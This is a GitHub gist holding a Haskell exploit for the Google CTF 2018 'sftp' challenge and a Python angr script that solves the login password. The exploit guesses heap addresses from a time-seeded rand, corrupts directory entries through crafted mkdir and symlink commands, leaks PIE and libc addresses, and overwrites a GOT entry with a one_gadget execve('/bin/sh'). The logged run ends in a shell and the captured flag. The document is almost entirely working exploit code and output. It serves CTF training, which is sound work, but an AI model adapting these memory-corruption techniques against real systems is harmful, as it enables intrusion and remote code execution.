Created
June 25, 2018 15:04
-
-
Save Tosainu/65d2bbc4211383c436bc752a40901e75 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{-# LANGUAGE OverloadedStrings #-} | |
-- Google CTF 2018 Quals: sftp | |
import Control.Monad | |
import Control.Monad.IO.Class (liftIO) | |
import Data.Bits | |
import qualified Data.ByteString.Char8 as BS | |
import Data.List | |
import Data.Maybe | |
import Data.Monoid ((<>)) | |
import Data.Word | |
import Numeric (showHex) | |
import System.Environment | |
-- https://github.com/Tosainu/pwn.hs | |
import Pwn | |
foreign import ccall "time" c_time :: IO Word32 | |
foreign import ccall "srand" c_srand :: Word32 -> IO () | |
foreign import ccall "rand" c_rand :: IO Word32 | |
initRandomSeed :: Pwn () | |
initRandomSeed = liftIO $ c_time >>= c_srand | |
guessMallocAddress :: Pwn Word64 | |
guessMallocAddress = liftIO $ do | |
r <- c_rand | |
return $ fromIntegral $ 0x40000000 .|. (r .&. 0x1fffffff) | |
show' :: (Show a) => a -> BS.ByteString | |
show' = BS.pack . show | |
main :: IO () | |
main = pwn $ do | |
args <- liftIO getArgs | |
let isRemote = "remote" `elem` args | |
(host, port) = if isRemote then ("sftp.ctfcompetition.com", 1337) | |
else ("192.168.122.10", 4000) | |
let initialEntries = [ "/home/c01db33f" | |
, "/home/c01db33f/flag" | |
, "(flag data)" | |
, "/home/c01db33f/src" | |
, "/home/c01db33f/src/sftp.c" | |
, "(sftp.c data)" | |
] | |
let entry_size = 0x20 | |
directory_entry_size = entry_size + 8 + 8 * 16 | |
file_entry_size = entry_size + 8 + 8 | |
link_entry_size = entry_size + 8 | |
addr_root' = 0x208be0 | |
reloc_fread' = 0x00205030 | |
reloc_time' = 0x00205090 | |
reloc_memcpy' = 0x00205088 | |
reloc_printf_chk' = 0x002050b0 | |
reloc_mmap' = 0x00205048 | |
-- 0xf1147 execve("/bin/sh", rsp+0x70, environ) | |
-- constraints: | |
-- [rsp+0x70] == NULL | |
libc_one_gadget' = 0xf1147 | |
libc_mmap' = 0x00101680 | |
r <- remote host port | |
recvuntil r "Are you sure you want to continue connecting (yes/no)? " >>= liftIO . BS.putStrLn | |
-- wait something, then initialize random seed | |
initRandomSeed | |
sendline r "yes" | |
-- (angr) angr@6abd1d9325d8:/work$ python2 solve.py | |
-- WARNING | 2018-06-24 03:17:44,833 | cle.loader | The main binary is a position-independent executable. It is being loaded with a base address of 0x400000. | |
-- <SimulationManager with 1 found, 3 active, 7 avoid> | |
-- 'C\x80\x10\x01\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | |
-- (angr) angr@6abd1d9325d8:/work$ | |
recvuntil r "'s password: " >>= liftIO . BS.putStrLn | |
sendline r "C\x80\x10\x01\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" | |
recvline r >>= liftIO . BS.putStr | |
success "login successfull" | |
addresses <- replicateM 768 guessMallocAddress | |
info "initial entries" | |
forM_ (zip [0..] initialEntries) $ \f -> do | |
let (idx, fname) = f | |
fname' = fname <> replicate (maxlen - length fname) ' ' | |
maxlen = maximum $ map length initialEntries | |
success $ " " <> fname' <> " @ 0x" <> showHex (addresses !! idx) "" | |
info "finding exploitable address" | |
let ((v1i, v1a), (v2i, v2a)):((v3i, v3a), (v4i, v4a)):_ = | |
let as1 = zip [6..] $ drop 6 addresses | |
as2 = concat $ zipWith (zip . repeat) as1 (tails as1) | |
as3 = map (\(aa@(_, a), ba@(_, b)) -> if a > b then (aa, ba) else (ba, aa)) as2 | |
in flip filter as3 $ \((ai, aa), (bi, ba)) -> | |
let diff = aa - ba | |
in diff > directory_entry_size && diff < 0x1000 && ai < bi | |
success $ " addr1 = (" <> show v1i <> ", 0x" <> showHex v1a ")" | |
success $ " addr2 = (" <> show v2i <> ", 0x" <> showHex v2a ")" | |
success $ " addr3 = (" <> show v3i <> ", 0x" <> showHex v3a ")" | |
success $ " addr4 = (" <> show v4i <> ", 0x" <> showHex v4a ")" | |
info "leaking addresses" | |
forM_ [6..max v2i v4i] $ \vi -> | |
case (vi == v1i, vi == v2i, vi == v3i, vi == v4i | |
, vi `elem` [v1i + 1, v1i + 2, v3i + 1, v3i + 2]) of | |
(True, _, _, _, _) -> do | |
recvuntil r "sftp> " | |
sendline r $ "put dummy" <> show' vi | |
sendline r "1" | |
send r "z" | |
recvuntil r "sftp> " | |
-- create symlink to bypass entry type checking | |
sendline r $ "symlink dummy" <> show' vi <> " poepoe1" | |
success " addr1 created!" | |
(_, True, _, _, _) -> do | |
recvuntil r "sftp> " | |
let offset = v1a - v2a - 8 - 4 | |
buffer = BS.concat $ catMaybes | |
[ Just $ BS.replicate (fromIntegral offset) 'z' | |
, Just $ BS.replicate 8 'b' -- parent | |
, p32 $ complement 5 -- type | |
, Just $ BS.replicate 28 'c' -- name & size | |
-- , p64 $ head addresses | |
] | |
sendline r $ "mkdir " <> buffer | |
success " addr2 created!" | |
(_, _, True, _, _) -> do | |
recvuntil r "sftp> " | |
sendline r $ "put dummy" <> show' vi | |
sendline r "1" | |
send r "z" | |
recvuntil r "sftp> " | |
-- create symlink to bypass entry type checking | |
sendline r $ "symlink dummy" <> show' vi <> " poepoe2" | |
success " addr3 created!" | |
(_, _, _, True, _) -> do | |
recvuntil r "sftp> " | |
let offset = v3a - v4a - 8 - 4 | |
buffer = BS.concat $ catMaybes | |
[ Just $ BS.replicate (fromIntegral offset) 'z' | |
, Just $ BS.replicate 8 'b' -- parent | |
, p32 $ complement 5 -- type | |
, Just $ BS.replicate 28 'c' -- name & size | |
, p64 $ (addresses !! v1i) + 0x20 | |
] | |
sendline r $ "mkdir " <> buffer | |
success " addr4 created!" | |
(_, _, _, _, True) -> return () | |
_ -> do | |
recvuntil r "sftp> " | |
sendline r $ "mkdir dummy" <> show' vi | |
let leak addr = do | |
recvuntil r "sftp> " | |
sendline r "put poepoe2" | |
sendline r "16" | |
send r $ BS.concat $ catMaybes | |
[ p64 0x20 | |
, p64 addr | |
] | |
recvuntil r "sftp> " | |
sendline r "get poepoe1" | |
recvuntil r $ show' 0x20 <> "\n" | |
recvn r 0x20 | |
Just addr_root <- u64 . BS.take 8 <$> leak (head addresses) | |
let pie_base = addr_root - addr_root' | |
success $ " pie_base = " <> showHex pie_base "" | |
Just libc_mmap <- u64 . BS.take 8 <$> leak (pie_base + reloc_mmap') | |
success $ " libc_mmap = " <> showHex libc_mmap "" | |
-- Just libc_printf_chk <- u64 . BS.take 8 <$> leak (pie_base + reloc_printf_chk') | |
-- success $ " libc_printf_chk = " <> showHex libc_printf_chk "" | |
let libc_base = libc_mmap - libc_mmap' | |
success $ " libc_base = " <> showHex libc_base "" | |
info "overwriting GOT" | |
recvuntil r "sftp> " | |
sendline r "put poepoe2" | |
sendline r "16" | |
send r $ BS.concat $ catMaybes | |
[ p64 0x20 | |
, p64 $ pie_base + reloc_printf_chk' | |
] | |
recvuntil r "sftp> " | |
sendline r "put poepoe1" | |
sendline r "8" | |
send r $ BS.concat $ catMaybes | |
[ p64 $ libc_base + libc_one_gadget' | |
] | |
interactive r | |
-- [x] Opening connection to sftp.ctfcompetition.com on port 1337 | |
-- [+] Opening connection to sftp.ctfcompetition.com on port 1337: Done | |
-- The authenticity of host 'sftp.google.ctf (3.13.3.7)' can't be established. | |
-- ECDSA key fingerprint is SHA256:+d+dnKGLreinYcA8EogcgjSF3yhvEBL+6twxEc04ZPq. | |
-- Are you sure you want to continue connecting (yes/no)? | |
-- Warning: Permanently added 'sftp.google.ctf' (ECDSA) to the list of known hosts. | |
-- [email protected]'s password: | |
-- Connected to sftp.google.ctf. | |
-- [+] login successfull | |
-- [*] initial entries | |
-- [+] /home/c01db33f @ 0x50a55ba8 | |
-- [+] /home/c01db33f/flag @ 0x5ddb3a71 | |
-- [+] (flag data) @ 0x4adbcdf6 | |
-- [+] /home/c01db33f/src @ 0x46f417e6 | |
-- [+] /home/c01db33f/src/sftp.c @ 0x55862221 | |
-- [+] (sftp.c data) @ 0x5e069003 | |
-- [*] finding exploitable address | |
-- [+] addr1 = (83, 0x46e341dd) | |
-- [+] addr2 = (214, 0x46e33f8b) | |
-- [+] addr3 = (99, 0x5fce6d32) | |
-- [+] addr4 = (245, 0x5fce6676) | |
-- [*] leaking addresses | |
-- [+] addr1 created! | |
-- [+] addr3 created! | |
-- [+] addr2 created! | |
-- [+] addr4 created! | |
-- [+] pie_base = 5602cdd69000 | |
-- [+] libc_mmap = 7fcd7b20c680 | |
-- [+] libc_base = 7fcd7b10b000 | |
-- [*] overwriting GOT | |
-- [*] Entering interactive mode | |
-- id uid=1337(user) gid=1337(user) groups=1337(user) | |
-- cat /home/*/flag CTF{Moar_Randomz_Moar_Mitigatez!} | |
-- [*] Leaving interactive mode |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import angr, claripy | |
def main(): | |
p = angr.Project('./sftp', load_options={'auto_load_libs': False}) | |
pie = 0x400000 | |
start = pie + 0x000014f5 | |
win = pie + 0x0000145c | |
fail = (pie + 0x0000145a,) | |
solver = claripy.BVS('', 15*8) | |
init = p.factory.blank_state(addr=start) | |
init.memory.store(init.regs.rsp, solver) | |
init.regs.rbx = init.regs.rsp | |
sm = p.factory.simulation_manager(init) | |
ex = sm.explore(find=win, avoid=fail) | |
print(ex) | |
for s in ex.found: | |
password = s.solver.eval(solver, cast_to=str) | |
print(repr(password)) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment